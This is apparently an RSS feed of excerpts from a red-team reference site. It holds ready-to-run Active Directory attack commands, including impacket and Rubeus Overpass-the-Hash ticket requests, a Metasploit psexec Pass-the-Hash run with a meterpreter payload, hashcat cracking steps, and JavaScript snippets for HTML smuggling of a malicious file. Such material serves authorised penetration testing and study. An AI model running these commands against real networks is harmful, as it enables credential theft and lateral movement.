 &lt;td style="text-align: right"&gt;&lt;code&gt;1000&lt;/code&gt;&lt;/td&gt;
 &lt;td&gt;NT&lt;/td&gt;
 &lt;td&gt;&lt;code&gt;&amp;lt;NT_HASH&amp;gt;&lt;/code&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td style="text-align: right"&gt;&lt;code&gt;5500&lt;/code&gt;&lt;/td&gt;
 &lt;td&gt;NetNTLMv1 / NetNTLMv1+ESS&lt;/td&gt;
 &lt;td&gt;&lt;code&gt;&amp;lt;USERNAME&amp;gt;::&amp;lt;DOMAIN&amp;gt;:&amp;lt;LM_RESPONSE&amp;gt;:&amp;lt;NTLM_RESPONSE&amp;gt;:&amp;lt;SERVER_CHALLENGE&amp;gt;&lt;/code&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td style="text-align: right"&gt;&lt;code&gt;5600&lt;/code&gt;&lt;/td&gt;
 &lt;td&gt;NetNTLMv2&lt;/td&gt;
 &lt;td&gt;&lt;code&gt;&amp;lt;USERNAME&amp;gt;::&amp;lt;DOMAIN&amp;gt;:&amp;lt;SERVER_CHALLENGE&amp;gt;:&amp;lt;NT_PROOF_STRING&amp;gt;:&amp;lt;NTLMV2_RESPONSE_BLOB&amp;gt;&lt;/code&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;/tbody&gt;
&lt;/table&gt;
&lt;p&gt;All hashes are not born equals, &lt;strong&gt;LM hash (LAN Manager hash)&lt;/strong&gt; is an obsolete Windows password-hashing format. Here are the steps to reproduce the LM hashing method.&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;Convert the password to uppercase.&lt;/li&gt;
&lt;li&gt;Pad or truncate it to exactly 14 characters.&lt;/li&gt;
&lt;li&gt;Split it into two independent 7-character halves.&lt;/li&gt;
&lt;li&gt;Convert each half into a DES key.&lt;/li&gt;
&lt;li&gt;Use each key to encrypt the fixed string.&lt;/li&gt;
&lt;li&gt;Concatenate the two 8-byte results.&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;LM hash can be cracked easily, NT hash might be cracked depending on the size of the password. However it is also possible to use it without breaking it, see the &lt;strong&gt;Hash - Pass the Hash&lt;/strong&gt; page.&lt;/p&gt;</description></item><item><title>Hash - OverPass-the-Hash</title><link>https://bokkapig.pages.dev/refs/internal/active-directory/hash-over-pass-the-hash/</link><pubDate>Sat, 25 Jul 2026 18:47:21 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/internal/active-directory/hash-over-pass-the-hash/</guid><description>&lt;blockquote&gt;
&lt;p&gt;In this technique, instead of passing the hash directly, we use the NT hash of an account to request a valid Kerberost ticket (TGT).&lt;/p&gt;
&lt;/blockquote&gt;
&lt;h2 id="using-impacket" class="anchored-heading"&gt;Using impacket&lt;a class="heading-anchor" href="#using-impacket" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" class="chroma"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;root@kali:~$ python ./getTGT.py -hashes &lt;span class="s2"&gt;&amp;#34;:1a59bd44fe5bec39c44c8cd3524dee&amp;#34;&lt;/span&gt; lab.ropnop.com
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;root@kali:~$ &lt;span class="nb"&gt;export&lt;/span&gt; &lt;span class="nv"&gt;KRB5CCNAME&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s2"&gt;&amp;#34;/root/impacket-examples/velociraptor.ccache&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;root@kali:~$ python3 psexec.py &lt;span class="s2"&gt;&amp;#34;jurassic.park/velociraptor@labwws02.jurassic.park&amp;#34;&lt;/span&gt; -k -no-pass
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;root@kali:~$ ktutil -k ~/mykeys add -p tgwynn@LAB.ROPNOP.COM -e arcfour-hma-md5 -w 1a59bd44fe5bec39c44c8cd3524dee --hex -V &lt;span class="m"&gt;5&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;root@kali:~$ kinit -t ~/mykers tgwynn@LAB.ROPNOP.COM
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;root@kali:~$ klist
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h2 id="using-rubeus" class="anchored-heading"&gt;Using Rubeus&lt;a class="heading-anchor" href="#using-rubeus" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" class="chroma"&gt;&lt;code class="language-powershell" data-lang="powershell"&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="c"&gt;# Request a TGT as the target user and pass it into the current session&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="c"&gt;# NOTE: Make sure to clear tickets in the current session (with &amp;#39;klist purge&amp;#39;) to ensure you don&amp;#39;t have multiple active TGTs&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="p"&gt;.\&lt;/span&gt;&lt;span class="n"&gt;Rubeus&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;exe&lt;/span&gt; &lt;span class="n"&gt;asktgt&lt;/span&gt; &lt;span class="p"&gt;/&lt;/span&gt;&lt;span class="n"&gt;user&lt;/span&gt;&lt;span class="err"&gt;:&lt;/span&gt;&lt;span class="n"&gt;Administrator&lt;/span&gt; &lt;span class="p"&gt;/&lt;/span&gt;&lt;span class="n"&gt;rc4&lt;/span&gt;&lt;span class="err"&gt;:&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="no"&gt;NTLMHASH&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt; &lt;span class="p"&gt;/&lt;/span&gt;&lt;span class="n"&gt;ptt&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="c"&gt;# Pass the ticket to a sacrificial hidden process, allowing you to e.g. steal the token from this process (requires elevation)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="p"&gt;.\&lt;/span&gt;&lt;span class="n"&gt;Rubeus&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;exe&lt;/span&gt; &lt;span class="n"&gt;asktgt&lt;/span&gt; &lt;span class="p"&gt;/&lt;/span&gt;&lt;span class="n"&gt;user&lt;/span&gt;&lt;span class="err"&gt;:&lt;/span&gt;&lt;span class="n"&gt;Administrator&lt;/span&gt; &lt;span class="p"&gt;/&lt;/span&gt;&lt;span class="n"&gt;rc4&lt;/span&gt;&lt;span class="err"&gt;:&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="no"&gt;NTLMHASH&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt; &lt;span class="p"&gt;/&lt;/span&gt;&lt;span class="n"&gt;createnetonly&lt;/span&gt;&lt;span class="err"&gt;:&lt;/span&gt;&lt;span class="n"&gt;C:&lt;/span&gt;&lt;span class="p"&gt;\&lt;/span&gt;&lt;span class="n"&gt;Windows&lt;/span&gt;&lt;span class="p"&gt;\&lt;/span&gt;&lt;span class="n"&gt;System32&lt;/span&gt;&lt;span class="p"&gt;\&lt;/span&gt;&lt;span class="n"&gt;cmd&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;exe&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;</description></item><item><title>Hash - Pass the Hash</title><link>https://bokkapig.pages.dev/refs/internal/active-directory/hash-pass-the-hash/</link><pubDate>Sat, 25 Jul 2026 18:47:21 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/internal/active-directory/hash-pass-the-hash/</guid><description>&lt;p&gt;The types of hashes you can use with Pass-The-Hash are NT or NTLM hashes. Since Windows Vista, attackers have been unable to pass-the-hash to local admin accounts that weren’t the built-in RID 500.&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;p&gt;Metasploit&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" class="chroma"&gt;&lt;code class="language-powershell" data-lang="powershell"&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;use&lt;/span&gt; &lt;span class="n"&gt;exploit&lt;/span&gt;&lt;span class="p"&gt;/&lt;/span&gt;&lt;span class="n"&gt;windows&lt;/span&gt;&lt;span class="p"&gt;/&lt;/span&gt;&lt;span class="n"&gt;smb&lt;/span&gt;&lt;span class="p"&gt;/&lt;/span&gt;&lt;span class="n"&gt;psexec&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="nb"&gt;set &lt;/span&gt;&lt;span class="n"&gt;RHOST&lt;/span&gt; &lt;span class="mf"&gt;10.2&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;0&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;3&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="nb"&gt;set &lt;/span&gt;&lt;span class="n"&gt;SMBUser&lt;/span&gt; &lt;span class="n"&gt;jarrieta&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="nb"&gt;set &lt;/span&gt;&lt;span class="n"&gt;SMBPass&lt;/span&gt; &lt;span class="n"&gt;nastyCutt3r&lt;/span&gt; 
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="c"&gt;# NOTE1: The password can be replaced by a hash to execute a `pass the hash` attack.&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="c"&gt;# NOTE2: Require the full NT hash, you may need to add the &amp;#34;blank&amp;#34; LM (aad3b435b51404eeaad3b435b51404ee)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="nb"&gt;set &lt;/span&gt;&lt;span class="n"&gt;PAYLOAD&lt;/span&gt; &lt;span class="n"&gt;windows&lt;/span&gt;&lt;span class="p"&gt;/&lt;/span&gt;&lt;span class="n"&gt;meterpreter&lt;/span&gt;&lt;span class="p"&gt;/&lt;/span&gt;&lt;span class="n"&gt;bind_tcp&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;run&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;shell&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;netexec&lt;/p&gt;</description></item><item><title>Hash - Pass The Key</title><link>https://bokkapig.pages.dev/refs/internal/active-directory/hash-pass-the-key/</link><pubDate>Sat, 25 Jul 2026 18:47:21 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/internal/active-directory/hash-pass-the-key/</guid><description>&lt;p&gt;Pass The Key allows attackers to gain access to systems by using a valid session key instead of the user&amp;rsquo;s password or NTLM hash. This technique is related to other credential-based attacks like Pass The Hash (PTH) and Pass The Ticket (PTT) but specifically uses session keys to authenticate.&lt;/p&gt;
&lt;p&gt;Pre-authentication requires the requesting user to provide a secret key, which is derived from their password and may use encryption algorithms such as DES, RC4, AES128, or AES256.&lt;/p&gt;</description></item><item><title>Hash Cracking</title><link>https://bokkapig.pages.dev/refs/internal/cheatsheets/hash-cracking/</link><pubDate>Sat, 25 Jul 2026 18:47:21 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/internal/cheatsheets/hash-cracking/</guid><description>&lt;h2 id="summary" class="anchored-heading"&gt;Summary&lt;a class="heading-anchor" href="#summary" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="https://hashcat.net/hashcat/"&gt;Hashcat&lt;/a&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="https://hashcat.net/wiki/doku.php?id=example_hashes"&gt;Hashcat Example Hashes&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#hashcat-install"&gt;Hashcat Install&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#mask-attack"&gt;Mask attack&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#dictionary"&gt;Dictionary&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a href="https://github.com/openwall/john"&gt;John&lt;/a&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="#john-usage"&gt;Usage&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a href="#rainbow-tables"&gt;Rainbow tables&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#tips-and-tricks"&gt;Tips and Tricks&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#online-cracking-resources"&gt;Online Cracking Resources&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#references"&gt;References&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id="hashcat" class="anchored-heading"&gt;Hashcat&lt;a class="heading-anchor" href="#hashcat" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;h3 id="hashcat-install" class="anchored-heading"&gt;Hashcat Install&lt;a class="heading-anchor" href="#hashcat-install" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h3&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" class="chroma"&gt;&lt;code class="language-powershell" data-lang="powershell"&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;apt&lt;/span&gt; &lt;span class="n"&gt;install&lt;/span&gt; &lt;span class="n"&gt;cmake&lt;/span&gt; &lt;span class="nb"&gt;build-essential&lt;/span&gt; &lt;span class="n"&gt;-y&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;apt&lt;/span&gt; &lt;span class="n"&gt;install&lt;/span&gt; &lt;span class="n"&gt;checkinstall&lt;/span&gt; &lt;span class="n"&gt;git&lt;/span&gt; &lt;span class="n"&gt;-y&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;git&lt;/span&gt; &lt;span class="n"&gt;clone&lt;/span&gt; &lt;span class="n"&gt;https&lt;/span&gt;&lt;span class="err"&gt;:&lt;/span&gt;&lt;span class="p"&gt;//&lt;/span&gt;&lt;span class="n"&gt;github&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;com&lt;/span&gt;&lt;span class="p"&gt;/&lt;/span&gt;&lt;span class="n"&gt;hashcat&lt;/span&gt;&lt;span class="p"&gt;/&lt;/span&gt;&lt;span class="n"&gt;hashcat&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;git&lt;/span&gt; &lt;span class="p"&gt;&amp;amp;&amp;amp;&lt;/span&gt; &lt;span class="nb"&gt;cd &lt;/span&gt;&lt;span class="n"&gt;hashcat&lt;/span&gt; &lt;span class="p"&gt;&amp;amp;&amp;amp;&lt;/span&gt; &lt;span class="n"&gt;make&lt;/span&gt; &lt;span class="n"&gt;-j&lt;/span&gt; &lt;span class="mf"&gt;8&lt;/span&gt; &lt;span class="p"&gt;&amp;amp;&amp;amp;&lt;/span&gt; &lt;span class="n"&gt;make&lt;/span&gt; &lt;span class="n"&gt;install&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;ol&gt;
&lt;li&gt;Extract the hash&lt;/li&gt;
&lt;li&gt;Get the hash format: &lt;a href="https://hashcat.net/wiki/doku.php?id=example_hashes"&gt;hashcat.net/example_hashes&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;Establish a cracking stratgy based on hash format (ex: wordlist -&amp;gt; wordlist + rules -&amp;gt; mask -&amp;gt; combinator mode -&amp;gt; prince attack -&amp;gt; &amp;hellip;)&lt;/li&gt;
&lt;li&gt;Enjoy plains&lt;/li&gt;
&lt;li&gt;Review strategy&lt;/li&gt;
&lt;li&gt;Start over&lt;/li&gt;
&lt;/ol&gt;
&lt;h3 id="dictionary" class="anchored-heading"&gt;Dictionary&lt;a class="heading-anchor" href="#dictionary" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h3&gt;
&lt;blockquote&gt;
&lt;p&gt;Every word of a given list (a.k.a. dictionary) is hashed and compared against the target hash.&lt;/p&gt;</description></item><item><title>HTML Smuggling</title><link>https://bokkapig.pages.dev/refs/internal/redteam/access/html-smuggling/</link><pubDate>Sat, 25 Jul 2026 18:47:21 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/internal/redteam/access/html-smuggling/</guid><description>&lt;h2 id="summary" class="anchored-heading"&gt;Summary&lt;a class="heading-anchor" href="#summary" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="#description"&gt;Description&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#executable-storage"&gt;Executable Storage&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id="description" class="anchored-heading"&gt;Description&lt;a class="heading-anchor" href="#description" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;p&gt;HTML Smuggling consists of making a user to navigate to our crafted HTML page which automaticaly download our malicious file.&lt;/p&gt;
&lt;h2 id="executable-storage" class="anchored-heading"&gt;Executable storage&lt;a class="heading-anchor" href="#executable-storage" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;p&gt;We can store our payload in a Blob object =&amp;gt; JS: &lt;code&gt;var blob = new Blob([data], {type: 'octet/stream'});&lt;/code&gt;
To perform the download, we need to create an Object Url =&amp;gt; JS: &lt;code&gt;var url = window.URL.createObjectURL(blob);&lt;/code&gt;
With those two elements, we can create with Javascript our &amp;lt;a&amp;gt; tag which will be used to download our malicious file:&lt;/p&gt;</description></item><item><title>IBM Cloud Managed Database Services</title><link>https://bokkapig.pages.dev/refs/internal/cloud/ibm/ibm-cloud-databases/</link><pubDate>Sat, 25 Jul 2026 18:47:21 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/internal/cloud/ibm/ibm-cloud-databases/</guid><description>&lt;p&gt;IBM Cloud offers a variety of managed database services that allow organizations to easily deploy, manage, and scale databases without the operational overhead. These services ensure high availability, security, and performance, catering to a wide range of application requirements.&lt;/p&gt;
&lt;h2 id="supported-database-engines" class="anchored-heading"&gt;Supported Database Engines&lt;a class="heading-anchor" href="#supported-database-engines" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;h3 id="1-postgresql" class="anchored-heading"&gt;1. PostgreSQL&lt;a class="heading-anchor" href="#1-postgresql" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h3&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Description&lt;/strong&gt;: PostgreSQL is an open-source relational database known for its robustness, extensibility, and SQL compliance. It supports advanced data types and offers features like complex queries, ACID compliance, and full-text search.&lt;/p&gt;</description></item><item><title>IBM Cloud Object Storage</title><link>https://bokkapig.pages.dev/refs/internal/cloud/ibm/ibm-cloud-object-storage/</link><pubDate>Sat, 25 Jul 2026 18:47:21 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/internal/cloud/ibm/ibm-cloud-object-storage/</guid><description>&lt;p&gt;IBM Cloud Object Storage is a highly scalable, secure, and durable cloud storage service designed for storing and accessing unstructured data like images, videos, backups, and documents. With the ability to scale seamlessly based on the data volume, IBM Cloud Object Storage is ideal for handling large-scale data storage needs, such as archiving, backup, and modern applications like AI and machine learning workloads.&lt;/p&gt;
&lt;h2 id="key-features" class="anchored-heading"&gt;Key Features&lt;a class="heading-anchor" href="#key-features" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;h3 id="1-scalability" class="anchored-heading"&gt;1. &lt;strong&gt;Scalability&lt;/strong&gt;&lt;a class="heading-anchor" href="#1-scalability" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h3&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Dynamic Scaling&lt;/strong&gt;: IBM Cloud Object Storage can grow dynamically with your data needs, ensuring you never run out of storage space. There’s no need for pre-provisioning or capacity planning, as it scales automatically based on demand.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;No Size Limits&lt;/strong&gt;: Store an unlimited amount of data, from kilobytes to petabytes, without constraints.&lt;/li&gt;
&lt;/ul&gt;
&lt;h3 id="2-high-durability-and-availability" class="anchored-heading"&gt;2. &lt;strong&gt;High Durability and Availability&lt;/strong&gt;&lt;a class="heading-anchor" href="#2-high-durability-and-availability" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h3&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Redundancy&lt;/strong&gt;: Data is automatically distributed across multiple regions and availability zones to ensure that it remains available and protected, even in the event of failures.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;99.999999999% Durability (11 nines)&lt;/strong&gt;: IBM Cloud Object Storage provides enterprise-grade durability, meaning that your data is safe and recoverable.&lt;/li&gt;
&lt;/ul&gt;
&lt;h3 id="3-flexible-storage-classes" class="anchored-heading"&gt;3. &lt;strong&gt;Flexible Storage Classes&lt;/strong&gt;&lt;a class="heading-anchor" href="#3-flexible-storage-classes" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h3&gt;
&lt;p&gt;IBM Cloud Object Storage offers multiple storage classes, allowing you to choose the right balance between performance and cost:&lt;/p&gt;</description></item><item><title>Initial Access</title><link>https://bokkapig.pages.dev/refs/internal/redteam/access/initial-access/</link><pubDate>Sat, 25 Jul 2026 18:47:21 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/internal/redteam/access/initial-access/</guid><description>&lt;blockquote&gt;
&lt;p&gt;Initial Access Files in the context of a Red Team exercise refer to the set of files, scripts, executables, or documents used by the Red Team to initially infiltrate the target system or network. These files often contain malicious payloads or are designed to exploit specific vulnerabilities in order to establish a foothold in the target environment.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;h2 id="summary" class="anchored-heading"&gt;Summary&lt;a class="heading-anchor" href="#summary" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="#complex-chains"&gt;Complex Chains&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#container"&gt;Container&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#payload"&gt;Payload&lt;/a&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="#binary-files"&gt;Binary Files&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#code-execution-files"&gt;Code Execution Files&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#embedded-files"&gt;Embedded Files&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a href="#code-signing"&gt;Code Signing&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id="complex-chains" class="anchored-heading"&gt;Complex Chains&lt;a class="heading-anchor" href="#complex-chains" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;blockquote&gt;
&lt;p&gt;DELIVERY(CONTAINER(TRIGGER + PAYLOAD + DECOY))&lt;/p&gt;</description></item><item><title>Internal - Coerce</title><link>https://bokkapig.pages.dev/refs/internal/active-directory/internal-relay-coerce/</link><pubDate>Sat, 25 Jul 2026 18:47:21 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/internal/active-directory/internal-relay-coerce/</guid><description>&lt;p&gt;Coerce refers to forcing a target machine (usually with SYSTEM privileges) to authenticate to another machine.&lt;/p&gt;
&lt;h2 id="signing" class="anchored-heading"&gt;Signing&lt;a class="heading-anchor" href="#signing" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;h3 id="server-side-signing" class="anchored-heading"&gt;Server Side Signing&lt;a class="heading-anchor" href="#server-side-signing" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h3&gt;
&lt;table&gt;
 &lt;thead&gt;
 &lt;tr&gt;
 &lt;th&gt;Operating System&lt;/th&gt;
 &lt;th&gt;SMB Signing&lt;/th&gt;
 &lt;th&gt;LDAP Signing&lt;/th&gt;
 &lt;/tr&gt;
 &lt;/thead&gt;
 &lt;tbody&gt;
 &lt;tr&gt;
 &lt;td&gt;Windows Server 2019 DC&lt;/td&gt;
 &lt;td&gt;✅&lt;/td&gt;
 &lt;td&gt;❌&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td&gt;Windows Server 2022 DC pre 23H2&lt;/td&gt;
 &lt;td&gt;✅&lt;/td&gt;
 &lt;td&gt;❌&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td&gt;Windows Server 2022 DC 23H2&lt;/td&gt;
 &lt;td&gt;✅&lt;/td&gt;
 &lt;td&gt;✅&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td&gt;Windows Server 2025 DC&lt;/td&gt;
 &lt;td&gt;✅&lt;/td&gt;
 &lt;td&gt;✅&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td&gt;Windows Server 2019 Member&lt;/td&gt;
 &lt;td&gt;❌&lt;/td&gt;
 &lt;td&gt;-&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td&gt;Windows Server 2022 Member&lt;/td&gt;
 &lt;td&gt;❌&lt;/td&gt;
 &lt;td&gt;-&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td&gt;Windows Server 2025 Member&lt;/td&gt;
 &lt;td&gt;❌&lt;/td&gt;
 &lt;td&gt;-&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td&gt;Windows 10&lt;/td&gt;
 &lt;td&gt;❌&lt;/td&gt;
 &lt;td&gt;-&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td&gt;Windows 11 23H2&lt;/td&gt;
 &lt;td&gt;❌&lt;/td&gt;
 &lt;td&gt;-&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td&gt;Windows 11 24H2&lt;/td&gt;
 &lt;td&gt;✅&lt;/td&gt;
 &lt;td&gt;-&lt;/td&gt;
 &lt;/tr&gt;
 &lt;/tbody&gt;
&lt;/table&gt;
&lt;ul&gt;
&lt;li&gt;Server-side SMB signing has been enabled on domain controllers&lt;/li&gt;
&lt;li&gt;Server-side SMB signing is still not required by default on non-DC Windows server&lt;/li&gt;
&lt;/ul&gt;
&lt;h3 id="epa" class="anchored-heading"&gt;EPA&lt;a class="heading-anchor" href="#epa" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h3&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="https://github.com/zyn3rgy/RelayInformer"&gt;zyn3rgy/RelayInformer&lt;/a&gt; - Python and BOF utilites to the determine EPA enforcement levels of popular NTLM relay targets from the offensive perspective.&lt;/li&gt;
&lt;/ul&gt;
